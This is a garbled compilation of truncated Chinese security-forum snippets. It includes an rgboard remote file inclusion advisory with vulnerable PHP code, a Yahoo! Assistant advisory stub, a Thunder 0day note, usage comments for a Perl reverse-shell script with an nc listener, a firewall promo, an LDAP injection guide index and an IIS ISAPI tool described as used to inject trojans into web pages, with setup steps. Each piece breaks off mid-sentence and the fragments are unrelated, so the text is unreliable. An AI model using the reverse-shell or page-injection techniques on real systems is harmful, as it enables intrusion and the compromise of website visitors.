Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php：
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接

来源：

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
Overview:
Yahoo!助手(原3721网络助手),是一个IE下的BHO (Browser Helper Object).

Yahoo!助手有许多功能,例如IE设置修

作者：疯狗
以前一直在传迅雷还有0day，Activex的应该差不多了，但是也不敢怠慢，还是卸载之，今天丰初发来一URL，原来素一迅雷0day，看说明还是远程！感觉装了一个，看那个漏洞监听的端口
C:\>netstat -na|find “36897″
TCP    127.0.0.1:36897        0.0.0.0:0              LISTENING

绑定的本地IP啊？！那就说明这个是不可

作者：小杰

都是使用nc监听！
反向连接代码：

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type ‘exit‘ to exit or press En

PS:很有必要安装一个．

介绍：

你的网站是否经常遭到非法攻击?是否因盗链或P2P多线程下载而耗尽带宽资源?是否没钱购买网上的此类软件?那么请使用Safe3 IIS FireWall吧！Safe3 IIS FireWall是一款完全免费的IIS防护软件，内置如下功能，主要防止黑客攻击和多线程下载占用带宽。



软件功能：

防止SQL注入式攻击；
防止溢出代码攻击；
防止特殊字符构成的URL利用；
防止XSS跨站提交；
防止网站文件盗链；
防止构造危险的Cookie；
防止迅雷等p2p多线程下

----------------------------------------------------------------
LDAP 注入
首发：http://lovelaozang.cn
翻译整理：老臧
资料来源：milw0rm，网络
参考文档：《LDAP injections》 Author: ka0x
----------------------------------------------------------------

-[ INDEX ]-
0x01: Introduction
0x02: Filters LDAP
0x03: LDAP injection in Web Applications
0x04: Links

---[ 0x01: Introduction ]
LDAP是轻量目录访

来源：安全警戒线论坛
用于向网页中插入代码，支持iframe以及script 标签。
原本这程序是别人定做的，因为交易方式的分歧，闹的不惶而散。看到群里有人不知道在那弄到的，当成宝贝是的，既然没交易，就发出来吧。原本人家是用来挂广告的，让有心人用来挂马用了。原理很简单，就是在IIS应用程序池isapi，特点是解决了win2003假死问题，缩短IIS应用池回收时间。
测试环境WIN2003+IIS XPSP2+IIS     WIN2000没测试。
首先打开GetID.exe获取注册号，运行IIS_AD.exe生成DLL文件，加载到IIS应用池就OK了